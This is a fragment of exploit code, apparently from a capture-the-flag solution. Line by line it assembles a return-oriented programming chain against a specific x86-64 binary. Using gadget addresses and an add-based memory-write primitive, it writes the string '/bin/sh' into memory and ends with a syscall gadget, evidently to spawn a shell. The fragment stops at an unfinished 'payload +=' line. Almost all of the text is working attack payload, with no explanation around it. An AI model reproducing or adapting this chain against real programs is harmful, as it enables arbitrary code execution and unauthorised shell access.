payload = p64(0x4017ca)
#0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x3c)+p64(0x425241)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x405140)+p64(0x4251dc)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x4017d1)+p64(0x425211)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x6e69622f)+p64(0x4250ad)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x68662f)+p64(0x4250b1)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x425070)+p64(0x4095a7)
# 0x00000000004095a7: mov rax, 0xffffffffffffffff; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x84a3212)+p64(0x0)+p64(0x4156ad)
# 0x00000000004156ad: pop rcx; ret; 
payload += p64(0x5)+p64(0x41722d)
# 0x000000000041722d: pop rdx; sar esi, cl; jmp qword ptr [rsi + 0xf]; 
payload += p64(0x425204)
# 0x405140: add eax, dword ptr [rdx] ; retf
payload += p32(0x4017d1)+p32(0x33)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x84a38a0)+p64(0x0)+p64(0x4156ad)
# 0x00000000004156ad: pop rcx; ret; 
payload += p64(0x5)+p64(0x41722d)
# 0x000000000041722d: pop rdx; sar esi, cl; jmp qword ptr [rsi + 0xf]; 
payload += p64(0x0)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x408e3b)
# 0x0000000000408e3b: syscall; ret; 
payload +=
